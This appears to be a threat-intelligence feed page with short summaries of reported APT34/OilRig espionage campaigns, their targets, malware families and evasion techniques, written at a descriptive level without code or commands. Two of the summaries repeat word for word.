Threats Feed

APT34 (OilRig) has launched a targeted cyber espionage campaign against Iraqi government entities since 2024, using spearphishing emails with forged documents to deploy custom C# malware disguised as PDF files. The malware performs system reconnaissance, anti-VM checks, and sets up persistence via scheduled tasks. It communicates with command-and-control infrastructure through both HTTP and compromised Iraqi government email accounts (SMTP/IMAP). The group also utilizes European-hosted infrastructure with deceptive 404 pages and obfuscated communication protocols. Targeted sectors include government, energy, finance, defense, and telecommunications, indicating a continued focus on intelligence gathering in the Middle East.

OilRig (APT34) has targeted the government, technology and energy sectors across the Middle East. Its operations include spearphishing campaigns, PowerShell-based backdoors (Helminth, QUADAGENT), and exploitation of vulnerabilities such as CVE-2024-30088. The group relies on obfuscation techniques to evade detection and uses tools such as STEALHOOK for privilege escalation, lateral movement and data exfiltration. Key targets include Saudi Arabian organisations and Middle Eastern government agencies, highlighting OilRig's focus on geopolitical intelligence gathering. The campaigns demonstrate advanced persistence, stealth and adaptability in line with state-sponsored objectives.

OilRig (APT34) has targeted the government, technology and energy sectors across the Middle East. Its operations include spearphishing campaigns, PowerShell-based backdoors (Helminth, QUADAGENT), and exploitation of vulnerabilities such as CVE-2024-30088. The group relies on obfuscation techniques to evade detection and uses tools such as STEALHOOK for privilege escalation, lateral movement and data exfiltration. Key targets include Saudi Arabian organisations and Middle Eastern government agencies, highlighting OilRig's focus on geopolitical intelligence gathering. The campaigns demonstrate advanced persistence, stealth and adaptability in line with state-sponsored objectives.

Earth Simnavaz, also known as APT34 or OilRig, has been targeting governmental entities in the UAE and Gulf region, focusing on the energy sector and critical infrastructure. The group uses sophisticated tactics, including the exploitation of Microsoft Exchange servers for credential theft and privilege escalation via CVE-2024-30088. They employ custom .NET tools, PowerShell scripts, and IIS-based malware to avoid detection. Additionally, the attackers utilize ngrok for persistent access and lateral movement, and manipulate password filters to extract plain-text credentials. These credentials are used for supply chain attacks, with a focus on exfiltrating sensitive data through compromised email servers.

The Iranian state-sponsored threat actor, OilRig, known for targeting global sectors such as Government, Financial Services, Energy, Telecommunications, and Technology, carried out an attack in August 2022 using a malicious Word document. This document contained embedded macros that dropped additional payloads for discovery, collection, and exfiltration routines. The payloads used PowerShell scripts and Windows utilities for information gathering and established persistence with a scheduled task named "WindowsUpdate". OilRig used multiple techniques in this attack such as Process Discovery, System Information Discovery, File and Directory Discovery, System Network Configuration Discovery, and others.

TA452's August 2022 intrusion involved a malicious Word document with a VBA macro that established persistence and C2 communication. The threat actors used AutoHotkey for keylogging, PowerShell scripts for discovery, and exfiltrated data using makecab.exe. They employed sophisticated techniques such as base64 encoding, obfuscation, and scheduled tasks to maintain access and evade detection. The campaign is linked to OilRig group and targeted organizations with custom-tailored malware, hinting at state-sponsored activity. Data was exfiltrated over encrypted channels, with evidence pointing to an organized and targeted approach.

AttackIQ has released attack graphs emulating OilRig’s operations against global sectors, based on reports from Mandiant, Intezer, and Palo Alto Networks. The 2020 social media phishing campaign used LinkedIn to distribute malicious documents, leading to the Tonedeaf backdoor installation, persistence via scheduled tasks, and credential dumping with tools like LaZagne. The 2018 QuadAgent campaign targeted technology service providers and government agencies with PowerShell malware, establishing persistence, and utilizing multi-channel command-and-control communication, including SSL, HTTP, and DNS.

OilRig targeted a telecommunications organization in the Middle East using a variant of their RDAT tool, featuring a novel email-based command and control (C2) channel that employs steganography. This method hides commands and data within bitmap images attached to emails, making detection difficult. The attack involved custom Mimikatz tools for credential dumping, Bitvise for SSH tunneling, and PowerShell downloaders. RDAT has been under development since 2017, evolving to include DNS tunneling and Exchange Web Services (EWS) for C2 communications. The use of steganographic images in emails represents a sophisticated evasion technique.

APT34 has launched a new campaign targeting United States-based research services company Westat, and its customers, employing a modified toolset. The attack was discovered in late January 2020 and initiated with a spear-phishing operation using a disguised employee satisfaction survey file, survey.xls. Once the victim enabled macros, malicious VBA code executed, extracting and installing a more advanced and stealthy variant of the TONEDEAF malware, TONEDEAF 2.0. The attackers also possibly used a VALUEVAULT implant for browser credential theft. The effort demonstrates APT34's substantial investment in upgrading its toolset to evade future detection.

IBM's X-Force team has detailed a new destructive malware, ZeroCleare, targeting the energy sector in the Middle East. The wiper, similar to Shamoon, overwrites data and maliciously uses legitimate tools. Attribution points to Iranian state-sponsored groups, possibly a collaboration between ITG13 and another entity. The report highlights the increase in destructive attacks, particularly in the energy sector, and offers mitigation strategies, including the use of threat intelligence, robust security controls and effective backup systems. Finally, it notes the wider geopolitical implications of such attacks.

This NSFOCUS report details an analysis of a leaked toolkit belonging to the APT34 hacking group, also known for its similarities to OilRig. The report focuses on the toolkit's components, including Trojans such as Glimpse and PoisonFrog, and Webshells used for privilege escalation and data exfiltration, primarily targeting the energy and financial sectors, particularly in China and the Middle East. The analysis details the functionality and communication methods of the tools, which use DNS tunneling for command and control.

Mandiant detected a phishing campaign by APT34, an Iranian-nexus threat actor, in late June 2019. The actor, posing as a member of Cambridge University, delivered malicious documents via LinkedIn and introduced three new malware families. The primary industries targeted by this campaign were Energy and Utilities, Government, and Oil and Gas. APT34 is notably active in the Middle East, employing a blend of public and non-public tools to carry out its cyber espionage activities.

The APT34/OILRIG group, linked to Iranian intelligence, had its operational details leaked by the "Lab Dookhtegan" group on Telegram. The leaks revealed a C2 infrastructure, PowerShell-based agents, ASP web shells ("HighShell" and "HyperShell"), and a DNS-based espionage toolset ("dnspionage"). These tools facilitate file transfer, credential theft and covert communication via proxies and DNS manipulation. The attackers also collected sensitive data, including domain admin credentials, indicating a potential target for high-value networks. While specific sectors or countries are not detailed, the tools suggest a focus on espionage and disruption. Other tools, such as 'MinionProject' and 'FoxPanel222', remain under analysis.

The OilRig group continued its espionage activities, primarily within the Middle East. Between May and June 2018, they orchestrated multiple attacks using compromised accounts from a Middle Eastern government agency, targeting a technology services provider and another government entity. The group leveraged a PowerShell backdoor called QUADAGENT and employed spear-phishing tactics, obfuscation using the Invoke-Obfuscation toolkit, and PE files to achieve their objectives. They also used stolen credentials and decoy dialog boxes to reduce suspicion and evade detection.

The OilRig group continued its espionage activities, primarily within the Middle East. Between May and June 2018, they orchestrated multiple attacks using compromised accounts from a Middle Eastern government agency, targeting a technology services provider and another government entity. The group leveraged a PowerShell backdoor called QUADAGENT and employed spear-phishing tactics, obfuscation using the Invoke-Obfuscation toolkit, and PE files to achieve their objectives. They also used stolen credentials and decoy dialog boxes to reduce suspicion and evade detection.